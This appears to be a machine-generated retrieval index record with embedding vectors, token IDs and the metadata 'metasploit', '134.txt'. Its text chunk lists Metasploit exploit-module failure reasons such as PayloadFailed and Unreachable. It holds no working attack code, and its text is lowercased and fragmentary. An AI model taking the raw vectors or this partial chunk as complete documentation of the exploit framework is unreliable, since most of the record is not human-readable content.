-0.35897961258888245, -0.42099806666374207, -0.393937349319458, 0.19502712786197662, -0.8627916574478149, 0.3537323772907257, -0.7318177223205566, -0.6265382170677185, -0.7369571328163147, -0.41350165009498596, -0.6341149806976318, -0.5634570121765137, -0.5163193345069885, -0.2020217925310135, -0.9659769535064697, 0.6139638423919678, -0.6812135577201843, 0.14110367000102997, -0.1048470064997673, -0.8915659189224243, 0.06730254739522934, 0.8952265977859497, -0.6749486923217773, 0.18462269008159637, 0.1712026298046112, -0.16878508031368256, 0.5798838138580322, -0.8010606169700623, 0.05616527423262596, -0.020473813638091087, -0.38355278968811035, 0.15946973860263824, 0.49420008063316345, -0.4957972466945648, 0.323889821767807, 0.138029545545578, -0.47661668062210083, 0.07709957659244537, -1.1676104068756104, -0.1598123013973236, 0.05384242534637451, 0.2457544207572937, -0.013262404128909111, 0.7576068639755249, 0.5069886445999146, 0.4374047815799713, -0.2855813205242157, 0.47055724263191223, 0.6250377297401428, 0.5214298367500305, -0.1004793718457222, 0.4422912001609802, -0.3116384744644165, 0.04831155762076378, 0.33229345083236694, 0.42029261589050293, -0.5528250932693481, 0.7215098142623901, 0.39234670996665955, 0.16700558364391327, 0.11140967905521393, -0.4919901192188263, 0.021907854825258255, 0.5667243003845215, 0.43691954016685486, 0.13030211627483368, 0.24586039781570435, -0.5094043016433716, -0.782306969165802, 0.0084172198548913, -0.9730490446090698, -0.05147460103034973, 0.1182822659611702, -0.5058993697166443, -0.9019918441772461, -0.4772839844226837, 0.07330403476953506, -0.11714322865009308, -0.009111256338655949, -0.31080034375190735, 0.3211105167865753, 0.17947307229042053, -0.10246088355779648, 1.0507407188415527, -0.03089950978755951, -0.03487548232078552, -0.38883545994758606, 0.3811940848827362, -0.8085134625434875, -1.105064868927002, -0.3843469023704529, 1.1980012655258179, 0.23383937776088715, -0.10154318064451218, -0.1237139105796814, -0.29092463850975037, -0.3518977165222168, -0.47849225997924805, -0.16135413944721222, -0.12671121954917908, -0.4114878475666046, 0.3850853443145752, -0.2884076237678528, -0.06142383813858032, -0.5282697081565857, 0.15952251851558685, 0.23227453231811523, -0.08240534365177155, -0.31502506136894226, 0.050218574702739716, 0.2663845419883728, 0.20472626388072968, 0.7847678065299988, 0.980812668800354, 0.7534855604171753, -0.4230545163154602, 0.2769050598144531, 0.12302889674901962, 0.17389094829559326, 0.07594800740480423, -0.002126363106071949, -0.1719040721654892, 0.5639262199401855, 0.6232179403305054, -1.1575112342834473, -0.8797745108604431, 1.0547032356262207, -0.00015710937441326678, -0.37652823328971863, 0.05677371844649315, -0.5834543108940125, 0.08862388134002686, 0.12818095088005066, -0.04998106136918068, 0.33848071098327637, -0.412306547164917, 0.4255756139755249, 0.21500015258789062, 0.22088013589382172, 1.0625110864639282, -0.31813567876815796, -0.1304570585489273, -0.2756332755088806, -0.0069449287839233875, 0.9881720542907715, 0.26954522728919983, -0.4735086262226105, 0.4352553188800812, 1.1837623119354248, 0.16363973915576935, 0.06493201851844788, 0.8435789942741394, -0.4833306670188904, 0.4895457923412323, 0.26956939697265625, 0.3530435562133789, -1.025808334350586, 0.8337150812149048, 0.149466872215271, -0.5859209299087524, -0.3795107901096344, -0.16508257389068604, 0.09063716977834702, -0.03769390285015106, 0.07906836271286011, -0.12635120749473572, 0.46142148971557617, -0.8629810810089111, 0.66712486743927, -0.5000396966934204, 0.25942373275756836, 0.02550957351922989, -0.11948691308498383, -0.5571439266204834, 0.8375886678695679, -0.06835603713989258, 0.4033742845058441, 0.416207492351532, 0.9438301920890808, -0.24851533770561218, 0.5196400284767151, -0.07434689998626709, -0.38112008571624756, -0.7381258010864258, 0.14228421449661255, -0.03249061852693558, -0.058629442006349564, 0.052368517965078354, -0.059698399156332016, 1.2485110759735107, 0.09086411446332932, -0.6962453722953796, -0.3687181770801544, -0.0964251384139061, -0.44178977608680725, -0.6691101789474487, 0.43468528985977173, 0.5020065903663635, -0.8603792190551758, -0.2922407388687134, 0.34041234850883484, 0.1514199823141098, 0.7411268949508667, -0.22698818147182465, -0.7708436846733093, -0.8170849680900574, 0.061009570956230164, 0.128070667386055, 0.2231062799692154, -0.6438384056091309, -0.4024704694747925, 0.10134734958410263, -1.0981894731521606, -0.4178961217403412, 0.24673527479171753, -0.5618360638618469, -0.3555910587310791, 0.2928865849971771, 0.18463751673698425, 0.550839364528656, 0.2617191970348358, -0.3375113010406494, 0.09412678331136703, 0.38008126616477966, 0.5800118446350098, 0.13366389274597168, 0.5375924110412598, 0.34382328391075134, 0.2268304079771042, 0.028801729902625084, -0.14079910516738892, 0.8251637816429138, -0.04245547577738762, -0.37516990303993225, 0.13269422948360443, -0.03717544302344322, -0.5689743161201477, -0.3721708655357361, 0.44526207447052, -0.2205372452735901, -0.006763922516256571, 0.08447544276714325, -1.267256498336792, -0.19114674627780914, -0.6450991630554199, -0.17669795453548431, 0.1828879863023758, 0.08158940821886063, 0.22899660468101501, -0.1726684272289276, 0.6271439790725708, -1.47148597240448, 4.3501105308532715, 0.7131587862968445, 0.14676673710346222, 0.008461489342153072, 0.14691169559955597, 0.5090414881706238, 0.8916769623756409, -0.47377878427505493, 0.08952762931585312, -0.5531350374221802, 0.6108686327934265, 0.2600097954273224, 0.2324296236038208, 0.0521024689078331, 0.15109315514564514, 0.18684476613998413, -1.0834088325500488, 0.39704981446266174, 0.26340755820274353, -0.6138849854469299, -0.7910441160202026, 0.13930940628051758, -0.7074817419052124, 0.4567570388317108, 0.26586997509002686, 0.22765931487083435, 0.22509291768074036, -1.3511284589767456, 0.6484432816505432, 0.09237423539161682, -0.5206804871559143, -0.42729076743125916, 0.10135205835103989, -0.7110573053359985, -0.7256361842155457, 0.14721374213695526, 0.4463498592376709, -0.6376355886459351, -0.3523893654346466, -0.6256226897239685, 0.8037975430488586, -0.2568799555301666, -0.02918272279202938, -0.4098363518714905, 0.08589858561754227, 0.3499700129032135, -0.1517983376979828, 0.32681211829185486, 0.6156762838363647, -0.7087214589118958, 0.8466581106185913, -0.17008419334888458, 0.6762663125991821, -0.5659626722335815, -0.7685337662696838, 0.17397639155387878, -0.10498569160699844, -0.09526565670967102, 0.04542667791247368, -0.14292997121810913, 0.19018705189228058, -0.5207181572914124, 0.2473406046628952, 0.11944098025560379, -0.6206918358802795, 0.9475800395011902, -0.5964402556419373, 0.05610714852809906, -0.30355870723724365, -0.11198483407497406, -0.4865041971206665, 0.1043434664607048, -0.527510404586792, -0.4891566038131714, 0.8475585579872131, -0.06670241057872772, -0.3611425459384918, 0.2849090099334717, 0.6533742547035217, -0.4480026364326477, -0.13675066828727722, -0.15670599043369293, -0.7035918831825256, 0.4285108149051666, 1.0009280443191528, 0.42771416902542114, -0.5302481651306152, -1.127266764640808, -0.08130013197660446, 0.571419358253479, 0.20958808064460754, 0.8250466585159302, -0.1918507069349289, 0.2631710469722748, -0.1677025854587555 ]
[ 101, 2006, 2023, 3931, 10288, 16613, 2571, 3594, 9006, 28139, 10222, 12742, 2862, 1997, 8246, 1035, 2007, 11709, 2860, 10222, 1037, 11336, 11896, 1010, 1996, 8246, 1035, 2007, 4118, 3640, 1037, 16367, 2126, 2000, 6235, 1996, 3114, 2005, 1996, 4945, 1012, 1996, 2034, 16381, 9041, 2006, 1996, 3426, 1997, 1996, 4945, 1012, 2742, 3594, 5302, 8566, 4244, 1013, 20397, 1013, 9808, 2595, 1013, 2334, 1013, 19219, 2080, 1035, 20786, 1035, 11826, 1012, 21144, 11896, 2478, 4945, 1024, 1024, 2025, 19722, 19666, 6906, 3468, 2065, 1996, 4638, 4118, 2515, 2025, 5769, 2008, 1996, 4539, 2003, 8211, 1024, 2065, 4638, 999, 1027, 4638, 16044, 1024, 1024, 8211, 8246, 1035, 2007, 4945, 1024, 1024, 2025, 19722, 19666, 6906, 3468, 1010, 1005, 4539, 2003, 2025, 8211, 1005, 2203, 14184, 1013, 20397, 1013, 4800, 1013, 8299, 1013, 2358, 22134, 2015, 2475, 1035, 3415, 15327, 1035, 13958, 20554, 1012, 21144, 11896, 2478, 1996, 4945, 1024, 1024, 18093, 7011, 18450, 2065, 1996, 4539, 1521, 1055, 3433, 2515, 2025, 2421, 1037, 5164, 8131, 2008, 1996, 18093, 5147, 6472, 1012, 14084, 1010, 2065, 1996, 4539, 16412, 2007, 2019, 8299, 7561, 1010, 1996, 11336, 1999, 6767, 9681, 8246, 1035, 2007, 2478, 1996, 4945, 1024, 1024, 9223, 2890, 22086, 16381, 1024, 2065, 1054, 1004, 1004, 1054, 1012, 20346, 2015, 1004, 1004, 1054, 1012, 20346, 2015, 1031, 1005, 3295, 1005, 1033, 1012, 3975, 1006, 1005, 1013, 1005, 1007, 1031, 1015, 1033, 1027, 1027, 3112, 1035, 5164, 6140, 1035, 2204, 1006, 1000, 18093, 5147, 3333, 1998, 6472, 1012, 1000, 1007, 3449, 5332, 2546, 1054, 1004, 1004, 1054, 1012, 20346, 2015, 1031, 1005, 3295, 1005, 1033, 21210, 6657, 2102, 1035, 7561, 1006, 1000, 3433, 1024, 1000, 1009, 1054, 1012, 20346, 2015, 1031, 1005, 3295, 1005, 1033, 1007, 8246, 1035, 2007, 1006, 4945, 1024, 1024, 18093, 7011, 18450, 1010, 1000, 4539, 2106, 2025, 5147, 15389, 1996, 5227, 1000, 1007, 3449, 5332, 2546, 1054, 1004, 1004, 1054, 1012, 3642, 1027, 1027, 4278, 8246, 1035, 2007, 1006, 4945, 1024, 1024, 9223, 2890, 22086, 1010, 1000, 4539, 2988, 2019, 25851, 7561, 2096, 23448, 1996, 18093, 1000, 1007, 2203, 7721, 2862, 1997, 8246, 1035, 2007, 11709, 10760, 2206, 2024, 2747, 2109, 8246, 1035, 2007, 11709, 1998, 1037, 4766, 6412, 1997, 2691, 3594, 1012, 8246, 1035, 2007, 16381, 16416, 3385, 2005, 4945, 7011, 4014, 5397, 1024, 1024, 2919, 8663, 8873, 13512, 5369, 5310, 1011, 3024, 11709, 2024, 19528, 1998, 2442, 2022, 13371, 1012, 4945, 1024, 1024, 23657, 10760, 4539, 2701, 1996, 4434, 20951, 1012, 4945, 1024, 1024, 2053, 6305, 9623, 8791, 3535, 2000, 14469, 3686, 3478, 1010, 3497, 2349, 2000, 19528, 22496, 1012, 4945, 1024, 1024, 3904, 10760, 9560, 2005, 1996, 11336, 2038, 2525, 2042, 2777, 1010, 2005, 2742, 1037, 14293, 9686, 25015, 3508, 2003, 2525, 1999, 2019, 8319, 6123, 1007, 4945, 1024, 1024, 2025, 2906, 18150, 10760, 9675, 4539, 2030, 18093, 10857, 2024, 28616, 8663, 8873, 27390, 2098, 2030, 1996, 4539, 4044, 2003, 4895, 6342, 9397, 15613, 1012, 4945, 1024, 1024, 2025, 14876, 18426, 3653, 10288, 2923, 2075, 5371, 2030, 7692, 2006, 4539, 2003, 4394, 1012, 4945, 1024, 1024, 2025, 19722, 19666, 6906, 3468, 10760, 4539, 2513, 1037, 3433, 24668, 1997 ]
metasploit
134.txt
0
being patched or otherwise mitigated. failure : : payloadfaileda return code from payload execution indicates the payload did not execute or terminated unexpectedly. failure : : timeoutexpiredthe target did not respond to the connection request in a timely manner. check rhosts and rport, then consider increasing wfsdelay. failure : : unexpectedreplythe target responded in an entirely unexpected way, and may not be running the vulnerable service at all. failure : : unknownan entirely unexpected exception occurred, and the target may not be running the expected services at all. failure : : unreachablethe host or service is not reachable, often indicated by a refused connection or icmp β€œ unreachable ” message. [SEP]
[ -0.48255762457847595, -0.2984607517719269, -0.4865237772464752, 1.042742133140564, -0.5736598968505859, -0.280802845954895, -0.032578244805336, -0.501253068447113, 0.8150376081466675, 0.5956777334213257, 0.05852695181965828, 0.2728782296180725, 0.12499553710222244, -0.2890847623348236, -0.7948068380355835, -0.2359418421983719, -0.1937141865491867, -0.033685456961393356, -0.33217552304267883, 0.09346067160367966, 0.5437407493591309, 0.25201570987701416, -0.8336634039878845, 0.03195420652627945, -0.7250094413757324, 0.19044145941734314, -0.07172363996505737, -0.11395281553268433, 1.1605069637298584, 1.3334161043167114, -0.20834803581237793, 0.03197703883051872, -0.35085609555244446, -1.102662205696106, -0.050124604254961014, -0.5793407559394836, 0.49749866127967834, -0.08969626575708389, -0.6604897975921631, -1.1415480375289917, 0.23951219022274017, 0.37979382276535034, -0.38957270979881287, -1.1467833518981934, -0.619189441204071, -0.266660213470459, -0.05872347578406334, -0.048998892307281494, -0.24885700643062592, -0.3536834418773651, -0.2642366588115692, 0.537088930606842, -0.20008322596549988, -0.9433552622795105, -0.1491200476884842, -0.06419529765844345, -0.11357735842466354, 0.3681623041629791, -0.6799018383026123, -0.20360669493675232, 0.23772898316383362, -0.5753081440925598, -0.2651523947715759, -0.9424071311950684, -0.30784139037132263, 0.5885220766067505, -0.8583056330680847, 0.2096973955631256, -0.1834937185049057, -0.40384534001350403, -0.031808041036129, 1.0382388830184937, -0.531558096408844, -0.82389235496521, -0.5953320264816284, 0.06132476031780243, -0.38685622811317444, 0.7988423705101013, -0.4009571373462677, 0.9454204440116882, 0.45551300048828125, 0.9182347059249878, 0.3060571253299713, -0.1498105376958847, -0.1491416096687317, -0.573822021484375, 0.18785609304904938, -0.18548136949539185, 0.2641642987728119, 0.3742697834968567, -0.348657488822937, 0.5509708523750305, -0.8281927704811096, -0.5484113693237305, -0.6295244693756104, 0.5914389491081238, -0.7276390790939331, 0.06723576784133911, -1.1590462923049927, 0.06261242181062698, 0.3799750804901123, 0.9233231544494629, -0.08755125105381012, -0.1078987717628479, -1.3277642726898193, 0.32206466794013977, 0.9620727300643921, -0.32207557559013367, -1.4519599676132202, 0.017396917566657066, -0.05000606179237366, 0.04333222284913063, -0.5969708561897278, -0.27593138813972473, -0.8293523192405701, 0.6281920671463013, 0.01353081688284874, 0.015979984775185585, -0.12038680166006088, -0.11054819822311401, 0.3527525067329407, 0.030774308368563652, 0.34288179874420166, -0.04238550737500191, -0.06606224924325943, -0.3934548795223236, -0.23871354758739471, 0.906451404094696, 0.490967720746994, -0.6211064457893372, -0.24146762490272522, -0.19856326282024384, 0.4782673418521881, 0.5157673954963684, -0.3340613543987274, -0.3573826253414154, 0.17922872304916382, -0.18680861592292786, 0.8722398281097412, -0.3366053104400635, 0.005967883393168449, -0.4522353410720825, 0.42813026905059814, 1.4244650602340698, -0.47362762689590454, 0.4614900052547455, 0.6406049132347107, -0.27592727541923523, -1.280214548110962, 0.052498891949653625, -0.23126858472824097, 0.29933422803878784, 0.1507481336593628, -0.12897008657455444, 0.44624629616737366, -0.14137081801891327, 0.20241974294185638, 0.33156540989875793, 0.38721776008605957, 0.21618035435676575, 0.4312492907047272, 0.7107827067375183, -0.7048659920692444, 0.6028760075569153, -0.48611804842948914, -0.28760960698127747, -0.6966853141784668, -0.11671967804431915, 0.06673110276460648, -0.5035485029220581, 1.0213830471038818, 0.21481788158416748, -0.04072197154164314, 0.5482659339904785, 1.2354967594146729, 0.18880195915699005, 0.2802392542362213, -0.3995644450187683, 0.40390732884407043, 0.7345277070999146, -0.17675451934337616, 0.36198484897613525, 0.3924393057823181, 0.4395033121109009, 0.4803353548049927, 0.32351917028427124, 0.7993075251579285, -0.4009155035018921, -0.6450965404510498, -0.46946701407432556, -0.01877952553331852, 0.18879444897174835, -0.27102306485176086, 0.6999011635780334, -0.26696616411209106, -0.2442261427640915, -0.9321703910827637, 0.3028857409954071, 0.62413090467453, -0.16699473559856415, -0.560029923915863, -0.1867213100194931, -1.240335464477539, 0.13504497706890106, -0.5743789672851562, -0.10292120277881622, 0.9441060423851013, 0.12404944002628326, 0.37241533398628235, -0.2827032506465912, 0.4263708293437958, -0.20187552273273468, -0.8666216135025024, 0.3680054247379303, 0.7554020285606384, -0.3657032251358032, -0.412993848323822, 1.0580475330352783, 0.2003435492515564, 0.09978371113538742, -0.594560980796814, 1.1233925819396973, 0.21241050958633423, 0.6879099011421204, -0.2622227966785431, -1.1875144243240356, -0.4093599021434784, 0.35186660289764404, -0.6474940180778503, -0.13038942217826843, -0.1293838918209076, 0.8196454644203186, -0.703963041305542, 0.8624114990234375, -0.07869037985801697, -0.2543239891529083, 0.1409580558538437, 0.7458519339561462, 0.14476101100444794, 0.6891090869903564, 0.29172050952911377, 0.7903556227684021, 0.2616657018661499, 0.25551214814186096, 0.6034589409828186, -0.6010145545005798, -0.05764719471335411, -0.5281225442886353, -0.21295388042926788, 0.29942694306373596, -0.3377830982208252, 0.8943328261375427, 1.3793144226074219, -0.09742821007966995, -1.0280733108520508, -0.8805626630783081, -0.823738157749176, 0.6837834119796753, -1.2824091911315918, 0.690138578414917, 0.22384339570999146, 0.15515528619289398, -0.12077049165964127, -0.5032012462615967, 0.46609073877334595, 0.5623783469200134, -0.02134724333882332, 0.12632843852043152, -0.19298569858074188, -0.3243716359138489, -0.6591071486473083, -0.7830842733383179, -0.5122588276863098, -0.1755538433790207, -0.8257714509963989, 0.062220148742198944, 0.41444793343544006, -0.3638458847999573, 0.8303202390670776, -0.07682618498802185, -0.33396050333976746, 0.42578360438346863, 0.38904687762260437, 0.5672699809074402, -0.13270805776119232, 0.4967731535434723, -0.5645403265953064, -0.0640491247177124, 0.12893575429916382, 0.14274927973747253, -0.08626995980739594, -0.30827686190605164, 0.4750653803348541, -0.22357438504695892, 0.21819640696048737, -0.2761102020740509, 0.13084885478019714, 0.004515606909990311, -0.7007389068603516, -0.6110327243804932, -0.5418293476104736, -0.6800028085708618, -0.4996674954891205, -0.00940102431923151, -0.5186038017272949, 0.7746550440788269, -0.15872667729854584, 0.05846834182739258, 0.4615700840950012, 0.7258979678153992, -0.8843058943748474, 0.8602239489555359, 0.07480450719594955, -0.4695832133293152, -0.741644024848938, 0.9327104687690735, 0.7008983492851257, -0.4944489002227783, 0.07077386230230331, -0.7172024250030518, -0.4661079943180084, -0.1321045458316803, 0.6277239322662354, -0.7328166365623474, -0.5820179581642151, 0.22740626335144043, -0.6444199085235596, -1.1352732181549072, 0.3033168315887451, -0.8991952538490295, -0.38487347960472107, 0.34064656496047974, -0.7541458606719971, 0.6305391192436218, 0.49247193336486816, 0.5582360029220581, -0.00679417559877038, -0.634984016418457, -0.9084453582763672, 0.3554190397262573, 0.0127257676795125, -0.39912286400794983, 0.12514632940292358, 0.3344867527484894, -0.012342289090156555, 0.18360131978988647, 0.5415557622909546, -0.0766279548406601, 0.2079191356897354, 0.39140784740448, -0.23526634275913239, 0.19940416514873505, 0.048067718744277954, -0.45840078592300415, -0.36910128593444824, 1.2230703830718994, -0.7029523253440857, 0.16538892686367035, -0.09697293490171432, 0.6358391046524048, 0.4251234531402588, -0.45543748140335083, 0.07610498368740082, -0.05863839387893677, -0.512027382850647, -0.9655358791351318, 0.47146132588386536, 0.9567533731460571, 0.9371729493141174, -0.1656540334224701, 0.11677543818950653, -0.44657185673713684, 0.41479477286338806, 0.04205794632434845, 0.11837676912546158, -0.5223717093467712, 0.5841699838638306, 0.025135695934295654, 0.265117347240448, -0.9062934517860413, -0.04082823544740677, 0.40580958127975464, 0.8003467917442322, 0.6176811456680298, 0.06720775365829468, -0.7137285470962524, -0.6698247790336609, 0.09958428889513016, -0.18434688448905945, 0.001284182770177722, -0.09196721017360687, -0.3376632332801819, 0.35679835081100464, -0.3763595223426819, -0.5299156308174133, -0.820706307888031, 0.47849124670028687, 0.7117866277694702, 0.20864801108837128, 0.5254623293876648, 0.2951538562774658, 0.05945056676864624, 0.6438097357749939, 0.2623179852962494, -0.04710645601153374, 0.09187784045934677, -1.1224607229232788, 0.40747660398483276, -0.40037012100219727, -0.06303606182336807, -0.39898431301116943, -0.047098979353904724, 0.785849928855896, -0.24673248827457428, -0.37299495935440063, -0.43874168395996094, -0.20222286880016327, 0.35378357768058777, 0.9786877036094666, -0.405611127614975, 0.38374626636505127, -0.975662112236023, 0.2558981776237488, -0.16778482496738434, 0.8449790477752686, -0.558504045009613, 0.110223688185215, 0.0650395080447197, 0.17332395911216736, 0.7159470915794373, -0.11026039719581604, 0.006279545370489359, -0.6008678078651428, -0.7673171758651733, -1.0935195684432983, 1.0845813751220703, 1.2622168064117432, -0.5146094560623169, 0.27164024114608765, -0.5662769079208374, 0.8323390483856201, 1.166866660118103, -0.34579893946647644, -0.6396132707595825, -0.27300146222114563, 0.45136722922325134, 0.7213975191116333, -0.2542729377746582, -0.6437764167785645, -0.043362345546483994, -0.17342127859592438, -1.3593697547912598, 0.310677707195282, -1.400523066520691, 0.01229538768529892, 0.2558367848396301, 0.6871732473373413, -0.04093281179666519, 0.75627201795578, -0.27580398321151733, 0.12669675052165985, -0.6660574078559875, 0.19360068440437317, -0.5664131045341492, 0.1542215198278427, 0.7339026927947998, -0.0012730094604194164, -0.5929105281829834, 0.5994865894317627, -0.3443710207939148, 0.13443472981452942, 0.3869897723197937, 0.20096929371356964, 0.05112249031662941, 0.03518177568912506, -0.17787067592144012, 0.35201025009155273, 0.7043495774269104, -0.15302562713623047, 0.18251876533031464, -0.5937376022338867, 0.9406189918518066, 0.3490484654903412, -0.3426823616027832, 0.5619531273841858, -0.6110015511512756, 0.4591940939426422, -0.22947770357131958, -0.717423141002655, 0.9082789421081543, -0.5207527279853821, 0.4208757281303406, -0.19785450398921967, -0.2943640947341919, -1.1286916732788086, 0.24936683475971222, 0.022538144141435623, 0.103661447763443, 0.42523351311683655, 0.31556352972984314, 0.3324648141860962, -1.1371216773986816, -0.9363206028938293, 0.38467344641685486, -0.30709385871887207, -0.2913804054260254, -0.6378041505813599, -0.2759944498538971, 0.3454029858112335, 0.06676486134529114, -0.34258776903152466, 1.1733949184417725, -0.14571857452392578, 0.23504815995693207, 0.4635929465293884, 0.020120956003665924, 0.3003813624382019, -0.10709590464830399, 0.5067879557609558, 0.04806043207645416, 0.17847496271133423, -0.636032223701477, -0.8078345060348511, 0.922985851764679, -0.6050622463226318, 0.6242774724960327, 0.013102253898978233, -0.5095381736755371, -0.6033525466918945, -0.5643160939216614, 0.005903766956180334, -0.5241676568984985, -0.23345249891281128, -0.599256694316864, -0.8625990748405457, -0.05371629446744919, 0.5102605223655701, 0.43500107526779175, -0.3215189278125763, -0.020713191479444504, -0.3899998366832733, 0.46939027309417725, -0.29343289136886597, -0.4248966872692108, 0.14254121482372284, -0.005103708244860172, -0.20177318155765533, 1.7124042510986328, -0.7647156119346619, -0.10818552225828171, -0.6227998733520508, 0.5707030296325684, 0.7804821729660034, 0.8309776782989502, -0.4811360836029053, -0.7419652938842773, 0.2820241451263428, 0.017307912930846214, 0.06655741482973099, 0.5546894669532776, -0.5527921915054321, -0.11944016814231873, -0.38132384419441223, 0.04141966626048088, -0.731355607509613, -0.19686156511306763, -0.06377657502889633, 0.436256468296051, 0.469870001077652, -0.4294709861278534, 0.5661464929580688, 0.6541324853897095, 0.39065760374069214, -0.2692100703716278, 0.555743396282196, -0.7504429221153259, -0.21342122554779053, -0.8871467113494873, -0.9243610501289368, 0.23518316447734833, -0.035989098250865936, -0.40375199913978577, -0.32831060886383057, -0.9360420107841492, 0.9605553150177002, -0.3553592264652252, 1.0177761316299438, 0.7640570998191833, -0.5166012644767761, -0.4306067228317261, -0.15784460306167603, 0.34982019662857056, 1.084304928779602, -0.6121286749839783, -0.034978266805410385, 0.31757691502571106, -0.1296587437391281, -0.38867202401161194, -0.2579502463340759, -0.42087048292160034, -0.15309159457683563, -0.2876867651939392, 0.9872467517852783, -0.15520523488521576, 0.6876072287559509, 0.028697559610009193, -0.5822533369064331, -1.1097458600997925, 0.7768612504005432, 0.5356075763702393, -0.0013296290999278426, 0.3990141749382019, 0.26699039340019226, -0.15168091654777527, 0.539705753326416, -0.7594162821769714, 0.17841018736362457, -0.3774198889732361, 0.9095338582992554, 0.08541365712881088, -0.42334604263305664, 1.3199187517166138, 0.690025806427002, -0.06001783907413483, -1.4082378149032593, -0.34297725558280945, 0.10597154498100281, -1.0455543994903564, -0.5658064484596252, -0.3612089455127716, 0.0363832488656044, 0.19108973443508148, -0.44471070170402527, -0.08353083580732346, 0.09717924147844315, 0.017269078642129898, -0.262763112783432, 0.8000669479370117, -0.2691056430339813, 0.4878312945365906, 1.4322477579116821, -0.12115192413330078, 0.642410397529602, -0.7762189507484436, 0.10555151849985123, -0.37160712480545044, -0.17243844270706177, 0.6874178647994995, -0.3206363320350647, -0.1861685961484909, 0.12430013716220856, -0.25131717324256897, 1.1455612182617188, -0.7966020107269287, 1.0569919347763062, 1.0821642875671387, -0.47676074504852295, -0.2722049951553345, 0.2347288578748703, -0.43016529083251953, -0.42893487215042114, 0.4379700720310211, -0.14991484582424164, 0.4513177275657654, 0.6919588446617126, 0.26727890968322754, 0.40585169196128845, -0.9837648272514343, -0.2839580774307251, -0.6362404227256775, -0.572150468826294, -0.7002914547920227, 0.23132608830928802, -0.18146373331546783, -0.08537361025810242, -0.2200952023267746, 0.3018040955066681, -0.8436598181724548, 0.12192763388156891, 0.20293909311294556, 0.5041435956954956, -0.4710073173046112, 0.09705246239900589, -0.6014025807380676, -1.0072922706604004, -1.0351022481918335, -0.3315872848033905, -0.3452708423137665, -0.37129488587379456, 0.28137627243995667, -0.5260125398635864, -0.677914559841156, 0.8414041996002197, -0.1355365514755249, 0.38624700903892517, -0.28533676266670227, -0.7187280654907227, 0.1385146677494049, -0.22859899699687958, -0.1887461394071579, 0.699910044670105, 0.5861565470695496, -0.5168639421463013, 0.12021934241056442, 0.4100208282470703, -0.343879759311676, 0.6787070631980896, -0.4509146809577942, 1.4028308391571045, -0.0724182277917862, -1.0671098232269287, -0.3855598568916321, 0.85926353931427, -1.2294522523880005, 0.28401270508766174, -0.719528079032898, -0.22408261895179749, 0.059538621455430984, 0.2858680188655853, 0.07697150111198425, 0.7903088927268982, -0.23743878304958344, 0.4453422427177429, -0.6192412376403809, -0.060027386993169785, 0.126192107796669, 0.4690132141113281, -0.7291679382324219, 0.2954593002796173, -0.18817026913166046, 0.1956474781036377, 0.6642487049102783, 0.055658578872680664, 0.007835439406335354, 0.12380988895893097, -0.5619845986366272, -0.007256857585161924, 0.0014377920888364315, -0.44172465801239014, -0.3154217600822449, 0.29992932081222534, -0.15739141404628754, 0.5382364392280579, 0.5020158290863037, -0.6729352474212646, -0.8467221856117249, 0.08995062112808228, -1.467481017112732, 0.3985235095024109, 0.3835247755050659, -0.5342596769332886, -0.5980120301246643, -0.5735903382301331, -0.45849359035491943, -0.27181920409202576, 0.2527502775192261, -0.44941720366477966, 0.08819153904914856, 0.4076518416404724, 0.6563171148300171, 0.2514236271381378, -0.7703263759613037, 0.38585302233695984, -0.25934550166130066, 0.32935065031051636, -0.6941318511962891, -1.0721464157104492, -0.00945763848721981, 1.691121220588684, -0.6523131132125854, 0.8009463548660278, -0.9012799263000488, 0.4270261526107788, -0.13068276643753052, -0.31329160928726196, 0.2479831576347351, 0.2745545506477356, -1.0279052257537842, 0.04071635752916336, 0.0007695385720580816, 0.33074966073036194, -0.15001599490642548, 0.2895190715789795, 0.7707305550575256, -0.4288768172264099, -0.4521830677986145, 0.34514373540878296, 0.556607186794281, -0.24320152401924133, 0.54230135679245, 0.9947458505630493, 0.041022516787052155, -0.1335650384426117, 0.023691140115261078, -0.2765806317329407, 0.6245436072349548, 0.5396444201469421, 0.7977925539016724, 0.05022277683019638, 0.9030534029006958, -0.23858371376991272, -1.0804696083068848, -0.45073601603507996, 0.4099867045879364, 0.1350109577178955, 0.17011286318302155, 0.8716973662376404, -0.32827305793762207, 0.025667758658528328, 0.22230187058448792, -0.2906433939933777, 0.20810489356517792, -0.026616014540195465, 0.673806369304657, 0.3721697926521301, 0.1830088496208191, 0.5505119562149048, -0.5697472095489502, -0.35760924220085144, -0.03422442078590393, -0.21009084582328796, 1.4486416578292847, 0.32788947224617004, -0.21054662764072418, -0.21723873913288116, 0.7737553715705872, 1.0134049654006958, -0.09517652541399002, 0.3336569368839264, -0.2970113754272461, 0.249729186296463, -0.5552143454551697, 0.47746244072914124, -0.3615226447582245, -0.03547089546918869, -0.12997666001319885, 0.28693386912345886, 0.3766805827617645, -0.04594383016228676, -0.08560086786746979, 0.17545224726200104, 0.15106302499771118, -0.16711567342281342, -0.05770749971270561, -0.21338608860969543, 0.29861980676651, -0.277310311794281, -0.2922087013721466, 0.5553991198539734, -0.702653169631958, -0.12916676700115204, 0.2433944046497345, 0.08061110228300095, 0.030434489250183105, 0.1943720281124115, 1.4690723419189453, -0.1256273239850998, 0.93967205286026, 0.13915763795375824, -0.033376481384038925, -0.5799181461334229, 0.4014280438423157, -1.0134702920913696, -0.20198391377925873, 0.03185002878308296, 0.3645160496234894, 0.5474990010261536, -0.6455078125, -0.5600569844245911, 0.2455875277519226, 0.6816985607147217, -0.01962154172360897, -1.6071890592575073, 1.0982131958007812, 0.637478232383728, -0.8903027176856995, 0.6862297654151917, 0.2690625786781311, 0.6006011366844177, 0.2080899477005005, -0.5570185780525208, -0.1274123191833496, -0.37298783659935, 0.1647588014602661, -0.3947608768939972, -0.5301719307899475, -0.5186647772789001, -0.8587314486503601, -0.16896523535251617, -0.5548869371414185, 0.2233051061630249, 0.21340949833393097, -0.8669883608818054, 0.2865789830684662, -0.029874160885810852, 0.48825711011886597, 0.2704758048057556, 0.5539472103118896, 0.0961071252822876, 0.1353302299976349, 0.5012349486351013, 1.095335602760315, -0.2875552773475647, 0.5563130974769592, 0.2638595700263977, -0.1637190878391266, 0.6317762732505798, -0.47664543986320496, 0.1486174315214157, -0.0332350954413414, -0.19510573148727417, -0.16981640458106995, 0.44544923305511475, -1.0176129341125488, -0.8242074847221375, 0.34185880422592163, 1.007362961769104, -0.3010829985141754, -0.5857605934143066, -0.6020439267158508, -0.4309331178665161, -0.6019585728645325, -0.1195538192987442, -0.5168348550796509, 1.042261004447937, 0.31499436497688293, -0.6127838492393494, 0.486958771944046, -1.2098757028579712, 3.817763090133667, 0.3591107726097107, 0.8546396493911743, 